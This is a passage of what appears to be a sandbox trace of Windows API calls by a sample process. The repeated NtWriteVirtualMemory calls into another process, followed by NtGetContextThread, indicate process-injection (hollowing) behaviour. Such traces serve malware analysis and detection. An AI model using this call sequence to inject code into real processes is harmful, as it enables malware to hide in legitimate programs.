hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.340] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f778, Buffer=0x37d00fe*, NumberOfBytesToWrite=0x2, NumberOfBytesWritten=0x0 | out: Buffer=0x37d00fe*, NumberOfBytesWritten=0x0) returned 0x0 [0199.340] GetLastError () returned 0x578 [0199.340] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.340] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0199.340] VarAdd (in: pvarLeft=0x18f750, pvarRight=0x18f740, pvarResult=0x18f730 | out: pvarResult=0x18f730) returned 0x0 [0199.340] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.341] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.341] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.341] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.341] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.341] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.342] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.342] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.342] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.342] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.342] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.342] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.342] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.342] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.342] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d01fc*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d01fc*, NumberOfBytesWritten=0x0) returned 0x0 [0199.342] GetLastError () returned 0x578 [0199.342] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.343] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.344] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.344] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.344] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.344] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.344] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.344] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.344] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.345] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.345] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d0204*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0204*, NumberOfBytesWritten=0x0) returned 0x0 [0199.345] GetLastError () returned 0x578 [0199.345] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.345] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.346] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.346] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.346] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.347] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.347] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.347] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.347] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.347] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.347] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.347] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.347] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.347] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.347] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.347] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d0200*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0200*, NumberOfBytesWritten=0x0) returned 0x0 [0199.347] GetLastError () returned 0x578 [0199.347] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.347] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0199.347] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.349] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.349] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.349] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.349] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.349] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.349] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.349] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.349] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.349] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.349] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.349] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.349] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.349] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.349] NtWriteVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x401000, Buffer=0x37d1048*, NumberOfBytesToWrite=0x3d000, NumberOfBytesWritten=0x0 | out: Buffer=0x37d1048*, NumberOfBytesWritten=0x0) returned 0x0 [0199.356] GetLastError () returned 0x578 [0199.356] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.356] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0199.356] VarAdd (in: pvarLeft=0x18f750, pvarRight=0x18f740, pvarResult=0x18f730 | out: pvarResult=0x18f730) returned 0x0 [0199.356] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.357] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.357] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.357] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.357] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.357] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.357] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.357] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.358] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.358] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.358] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.358] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.358] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.358] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.358] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d0224*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0224*, NumberOfBytesWritten=0x0) returned 0x0 [0199.358] GetLastError () returned 0x578 [0199.358] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.358] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.359] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.359] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.359] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.359] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.359] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.359] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.359] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.359] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.359] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d022c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d022c*, NumberOfBytesWritten=0x0) returned 0x0 [0199.359] GetLastError () returned 0x578 [0199.360] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.360] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.360] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.360] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.360] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.360] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.360] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.360] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.360] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.360] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.360] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.361] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.361] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.361] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.361] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.361] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d0228*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0228*, NumberOfBytesWritten=0x0) returned 0x0 [0199.361] GetLastError () returned 0x578 [0199.361] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.361] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0199.361] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.362] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.362] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.362] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.362] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.362] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.362] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.362] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.362] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.362] NtWriteVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x43e000, Buffer=0x37d0048*, NumberOfBytesToWrite=0x0, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0048*, NumberOfBytesWritten=0x0) returned 0x0 [0199.362] GetLastError () returned 0x578 [0199.363] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.363] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0199.363] VarAdd (in: pvarLeft=0x18f750, pvarRight=0x18f740, pvarResult=0x18f730 | out: pvarResult=0x18f730) returned 0x0 [0199.363] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.363] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.363] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.363] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.363] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.363] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.364] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.364] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.364] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.364] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.364] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.364] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.364] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.364] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.364] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d024c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d024c*, NumberOfBytesWritten=0x0) returned 0x0 [0199.364] GetLastError () returned 0x578 [0199.364] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.364] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.365] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.365] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.365] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.365] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.365] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.365] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.365] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.365] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.365] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.365] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.365] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.365] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.365] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.366] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d0254*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0254*, NumberOfBytesWritten=0x0) returned 0x0 [0199.366] GetLastError () returned 0x578 [0199.366] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.366] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.366] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.366] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.366] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.367] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.367] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.367] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.367] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.367] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.367] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.367] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.367] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.367] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.367] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.367] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f680, Buffer=0x37d0250*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0250*, NumberOfBytesWritten=0x0) returned 0x0 [0199.367] GetLastError () returned 0x578 [0199.367] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.367] VarAdd (in: pvarLeft=0x4070a0, pvarRight=0x18f760, pvarResult=0x18f750 | out: pvarResult=0x18f750) returned 0x0 [0199.367] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f67c | out: ppsaOut=0x18f67c) returned 0x0 [0199.368] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.368] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.368] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.368] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.368] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.368] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.368] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.368] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.368] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.368] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.368] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f54c | out: ppsaOut=0x18f54c) returned 0x0 [0199.417] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.417] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.417] NtWriteVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x442000, Buffer=0x380e048*, NumberOfBytesToWrite=0x1000, NumberOfBytesWritten=0x0 | out: Buffer=0x380e048*, NumberOfBytesWritten=0x0) returned 0x0 [0199.417] GetLastError () returned 0x578 [0199.417] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.417] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8a0 | out: ppsaOut=0x18f8a0) returned 0x0 [0199.418] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.418] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.418] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.419] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.419] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f734 | out: ppsaOut=0x18f734) returned 0x0 [0199.419] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.419] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.419] NtGetContextThread (in: ThreadHandle=0x108, Context=0x5def18 | out: Context=0x5def18*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xac1c9a, Ebp=0x0, Eip=0x77e301c4, SegCs=0x23, EFlags=0x202, Esp=0x30fd18, SegSs=0x2b, 